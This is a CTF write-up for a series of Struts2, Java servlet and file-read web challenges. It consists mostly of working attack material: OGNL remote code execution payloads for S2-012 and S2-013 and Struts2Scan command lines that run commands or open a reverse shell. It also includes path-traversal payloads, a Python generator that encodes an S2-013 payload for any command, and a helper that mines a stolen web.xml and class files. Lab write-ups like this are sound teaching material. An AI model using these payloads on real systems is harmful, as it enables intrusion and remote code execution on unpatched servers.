web279-web283
One-click exploitation with the script at https://github.com/wyzmgmdg/Struts2Scan
web284
Struts2 S2-012 exploitation. Build the payload following the reference article: OGNL that runs `env` through `ProcessBuilder`, reads the process output into a `char[50000]` buffer, and writes it into the `HttpServletResponse` taken from the OGNL context.

```
%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{"env"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}
```
web285
Build the payload following the reference article on Struts2 S2-013, or use the Struts2-Scan tool for one-click exploitation. The payload goes into the `url` parameter of `link.action`, URL-encoded:

```
/S2-013/link.action?url=%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C%23out.println(%23d)%2C%23out.close())%7D
```
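As an added example (not from the write-up and not part of Struts2Scan), the Python below rebuilds the S2-013 payload above from a command string, percent-encodes it the same way the page's payload is encoded (everything except `(`, `)` and `'` is escaped), and strips the NUL padding that `println(char[50000])` leaves after the real command output. The function names `s2_013_ognl`, `s2_013_url_param`, `s2_013_decode` and `extract_output` are chosen here, and the response body fed to `extract_output` is constructed.

```python
"""Build, encode and decode the S2-013 OGNL payload shown in the write-up.

Added example; it assumes the target reflects command output exactly as the
page's payload does (one read into char[50000], then println of the array),
so the response body ends in a run of NUL characters.
"""
from urllib.parse import quote, unquote

# The URL-encoded payload exactly as it appears on the page (web285).
PAGE_PAYLOAD = (
    "%24%7B(%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C"
    "%23a%3D%40java.lang.Runtime%40getRuntime().exec('env').getInputStream()%2C"
    "%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C"
    "%23c%3Dnew%20java.io.BufferedReader(%23b)%2C"
    "%23d%3Dnew%20char%5B50000%5D%2C%23c.read(%23d)%2C"
    "%23out%3D%40org.apache.struts2.ServletActionContext%40getResponse().getWriter()%2C"
    "%23out.println(%23d)%2C%23out.close())%7D"
)

BUFFER_SIZE = 50000  # size of the char[] buffer used by the page's payload


def s2_013_ognl(cmd: str, buffer_size: int = BUFFER_SIZE) -> str:
    """Return the plain (not yet URL-encoded) OGNL expression that runs `cmd`."""
    # The command lands inside a single-quoted OGNL string literal; refuse
    # characters that would break out of it instead of trying to escape them.
    if "'" in cmd or "\\" in cmd:
        raise ValueError("command must not contain single quotes or backslashes")
    return (
        "${("
        '#_memberAccess["allowStaticMethodAccess"]=true,'
        f"#a=@java.lang.Runtime@getRuntime().exec('{cmd}').getInputStream(),"
        "#b=new java.io.InputStreamReader(#a),"
        "#c=new java.io.BufferedReader(#b),"
        f"#d=new char[{buffer_size}],"
        "#c.read(#d),"
        "#out=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),"
        "#out.println(#d),"
        "#out.close()"
        ")}"
    )


def s2_013_url_param(cmd: str) -> str:
    """URL-encode the expression the way the page's payload is encoded:
    only '(' ')' and the single quote are left bare."""
    return quote(s2_013_ognl(cmd), safe="()'")


def s2_013_decode(param: str) -> str:
    """Decode an encoded payload back to readable OGNL for inspection."""
    return unquote(param)


def extract_output(body: str) -> str:
    """Strip the NUL padding println(char[50000]) appends after the command output,
    plus the trailing line terminator."""
    return body.rstrip("\x00\r\n")


if __name__ == "__main__":
    print(s2_013_decode(PAGE_PAYLOAD))
    print(s2_013_url_param("env") == PAGE_PAYLOAD)
```

Because the payload issues a single `read()` into the buffer, output longer than what one underlying read delivers is cut off; that is the truncation the later challenges work around with a reverse shell.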
web286-web288
Use the script. If the `--exec` output comes back truncated, get a reverse shell instead (the `-lr` option). The OGNL payloads above read the process output with a single `read(char[50000])` call, which returns only what one underlying read delivers, so long output can be cut short.
web289
```shell
$ python .\Struts2Scan.py -u http://6cc667dc-21e1-47f6-bc20-7c86de46d293.challenge.ctf.show/S2-029/default.action?message=aaaaa -n S2-032 --exec
>> env
```
web290
```shell
$ python .\Struts2Scan.py -u http://472b9395-a127-4f0b-9dbc-c9d19bf93912.challenge.ctf.show/S2-032/memoshow.action?id=3 -n S2-045 --exec
>> env
```
web291
```shell
$ python .\Struts2Scan.py -u http://b7828e36-6040-474a-8d74-5b2e47e9d225.challenge.ctf.show/S2-033/orders -n S2-045 --exec
>> env
```
web292
```shell
$ python .\Struts2Scan.py -u http://36034b6f-491f-4b59-8281-ede2349302ff.challenge.ctf.show/S2-037/orders -n S2-045 --exec
>> env
```
web293
```shell
$ python .\Struts2Scan.py -u http://474f4f6b-8ae7-42c0-bb45-9e1cf63bd17a.challenge.ctf.show/S2-045/orders -n S2-045 --exec
>> env
```
web294
```shell
$ python .\Struts2Scan.py -u http://79931272-f07a-41a3-8608-ec19106644c3.challenge.ctf.show/S2-046/doUpload.action -n S2-046 --exec
>> env
```
The tool's message that the vulnerability does not exist can be ignored.
web295
```shell
$ python .\Struts2Scan.py -u http://d8a2ded0-0c5d-4a17-846a-5ae627dd1468.challenge.ctf.show/S2-048/integration/saveGangster.action -d "name={exp}&age=11111&description=aaaa" -n S2-048 -lr x.x.x.x:9999
```
web296
```shell
$ python .\Struts2Scan.py -u http://770a3f17-692b-4558-aebe-838df182ff9c.challenge.ctf.show/S2-052/orders -n S2-045 --exec
>> env
```
web297
```shell
$ python .\Struts2Scan.py -u http://7545e434-5ce5-4cd7-8d62-2da3276d6cf3.challenge.ctf.show/S2-053/?name=VulApps -n S2-045 --exec
>> env
```
web298
Decompile the classes in the provided war package with jadx. The login servlet:
```java
package com.ctfshow.servlet;

import com.ctfshow.model.User;
import com.ctfshow.util.Util;
import java.io.IOException;
import java.io.PrintWriter;
import javax.servlet.ServletException;
import javax.servlet.http.HttpServlet;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;

public class loginServlet extends HttpServlet {
    private static final long serialVersionUID = -3044593499093610703L;

    public void destroy() {
        super.destroy();
    }

    public void doGet(HttpServletRequest request, HttpServletResponse response)
            throws ServletException, IOException {
        response.setContentType("text/html");
        PrintWriter out = response.getWriter();
        String username = request.getParameter("username");
        User user = new User(username, request.getParameter("password"));
        // Reference comparison, not content comparison: a request parameter
        // is a fresh String object, so this guard does not trip for "admin".
        if (username == "admin") {
            out.print("you are not admin");
        } else if (user.getVipStatus()) {
            out.print("you are login");
            out.print(Util.readFlag("/flag"));
        } else {
            out.print("login failed");
        }
        out.flush();
        out.close();
    }

    public void init() throws ServletException {
    }
}
```
The User model:
```java
package com.ctfshow.model;

import java.io.Serializable;

public class User implements Serializable {
    private static final long serialVersionUID = -4069265999830231626L;
    private Boolean isVip;
    private String password;
    private String username;

    public String getUsername() { return this.username; }
    public void setUsername(String username2) { this.username = username2; }
    public String getPassword() { return this.password; }
    public void setPassword(String password2) { this.password = password2; }
    public Boolean getIvVip() { return this.isVip; }
    public void setIvVip(Boolean ivVip) { this.isVip = ivVip; }

    public User(String username2, String password2) {
        this.username = username2;
        this.password = password2;
    }

    // The check that actually decides access: content comparison with equals().
    public boolean getVipStatus() {
        if (!this.username.equals("admin") || !this.password.equals("ctfshow")) {
            return false;
        }
        return true;
    }

    public String toString() {
        return "User [username=" + this.username + ", password=" + this.password
                + ", isVip=" + this.isVip + "]";
    }
}
```
Payload built from the source: `/ctfshow/login?username=admin&password=ctfshow`. The `username == "admin"` guard compares object references rather than contents, so a value coming from `request.getParameter` (a new String object, not the interned literal) never matches it, while `getVipStatus()` compares with `equals`, so `admin` / `ctfshow` reaches the branch that prints the flag.
web299
An HTML comment reveals `/view-source?file=index.php`, an arbitrary file read. Reading `WEB-INF/web.xml` shows the servlet `com.ctfshow.servlet.GetFlag`; reading `WEB-INF/classes/com/ctfshow/servlet/GetFlag.class` shows the flag path `/fl3g` among its string constants; reading `../../../../../../fl3g` gives the flag.
I tried downloading the class and decompiling it, without success.
payload: /view-source?file=../../../../../../fl3g
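The two reads in this challenge (web.xml first, then the servlet class it names) can be scripted once the file-read primitive is known. The Python below is an added example, not part of the write-up: `servlet_targets` parses the `servlet` and `servlet-mapping` entries of a web.xml and derives the class file path to fetch under `WEB-INF/classes`, and `class_strings` walks the constant pool of a class file and returns its `CONSTANT_Utf8` entries, which is where a string constant such as the page's `/fl3g` lives, so no decompiler is needed. The sample web.xml and class bytes are constructed here; only the class name `com.ctfshow.servlet.GetFlag` and the path `/fl3g` come from the page, while the servlet-name and the `/getflag` url-pattern are assumptions.

```python
"""Turn an exfiltrated WEB-INF/web.xml into the next files to read, then pull
string constants out of a fetched .class without decompiling it.

Added example for the write-up; sample inputs below are constructed.
"""
import struct
import xml.etree.ElementTree as ET

# Constructed web.xml mirroring the challenge; servlet-name and url-pattern are assumed.
SAMPLE_WEB_XML = """<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <servlet>
    <servlet-name>GetFlag</servlet-name>
    <servlet-class>com.ctfshow.servlet.GetFlag</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>GetFlag</servlet-name>
    <url-pattern>/getflag</url-pattern>
  </servlet-mapping>
</web-app>
"""


def _local(tag: str) -> str:
    """Drop the XML namespace web.xml files usually carry."""
    return tag.rsplit("}", 1)[-1]


def servlet_targets(web_xml: str) -> list:
    """Return one dict per servlet: class name, class file path, url patterns."""
    root = ET.fromstring(web_xml)
    classes, patterns = {}, {}
    for el in root:
        kind = _local(el.tag)
        fields = {_local(c.tag): (c.text or "").strip() for c in el}
        name = fields.get("servlet-name")
        if kind == "servlet" and name and "servlet-class" in fields:
            classes[name] = fields["servlet-class"]
        elif kind == "servlet-mapping" and name:
            patterns.setdefault(name, []).extend(
                (c.text or "").strip() for c in el if _local(c.tag) == "url-pattern")
    return [
        {
            "name": name,
            "class": cls,
            # Path to request through the file-read primitive, relative to the web root.
            "class_path": "WEB-INF/classes/" + cls.replace(".", "/") + ".class",
            "url_patterns": patterns.get(name, []),
        }
        for name, cls in classes.items()
    ]


def class_strings(data: bytes) -> list:
    """Return every CONSTANT_Utf8 entry of a class file's constant pool."""
    if data[:4] != b"\xca\xfe\xba\xbe":
        raise ValueError("not a Java class file")
    count = struct.unpack_from(">H", data, 8)[0]  # constant_pool_count
    pos, idx, out = 10, 1, []
    while idx < count:
        tag = data[pos]
        if tag == 1:                                   # Utf8: u2 length + bytes
            length = struct.unpack_from(">H", data, pos + 1)[0]
            # Java stores "modified UTF-8"; plain decoding is fine for ASCII paths.
            out.append(data[pos + 3:pos + 3 + length].decode("utf-8", "replace"))
            pos += 3 + length
        elif tag in (5, 6):                            # Long / Double take two slots
            pos += 9
            idx += 1
        elif tag in (3, 4, 9, 10, 11, 12, 17, 18):     # 4-byte payloads
            pos += 5
        elif tag in (7, 8, 16, 19, 20):                # 2-byte index payloads
            pos += 3
        elif tag == 15:                                # MethodHandle
            pos += 4
        else:
            raise ValueError(f"unknown constant pool tag {tag} at offset {pos}")
        idx += 1
    return out


def path_like_strings(data: bytes) -> list:
    """Constants that look like filesystem paths (the flag path in this challenge)."""
    return [s for s in class_strings(data) if s.startswith("/")]


def _utf8(s: str) -> bytes:
    b = s.encode("utf-8")
    return b"\x01" + struct.pack(">H", len(b)) + b


# Constructed class-file prefix: header plus a four-entry constant pool. Only the
# constant pool is parsed, so the rest of the file is omitted.
SAMPLE_CLASS = (
    b"\xca\xfe\xba\xbe" + b"\x00\x00\x00\x34"         # magic, minor 0, major 52
    + struct.pack(">H", 5)                            # constant_pool_count = entries + 1
    + _utf8("/fl3g")                                  # #1 Utf8
    + b"\x08" + struct.pack(">H", 1)                  # #2 String -> #1
    + _utf8("com/ctfshow/servlet/GetFlag")            # #3 Utf8
    + b"\x07" + struct.pack(">H", 3)                  # #4 Class -> #3
    + b"\x00\x21"                                     # access_flags (file truncated here)
)

if __name__ == "__main__":
    for t in servlet_targets(SAMPLE_WEB_XML):
        print(t["class_path"], t["url_patterns"])
    print(path_like_strings(SAMPLE_CLASS))
```

The parser stops after the constant pool on purpose: string literals, class names and method descriptors all live there, so the attribute and method tables can be left unparsed even if the fetched class is truncated by the file-read primitive.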
web300
Same as the previous challenge.
payload: /?file=../../../../../f1bg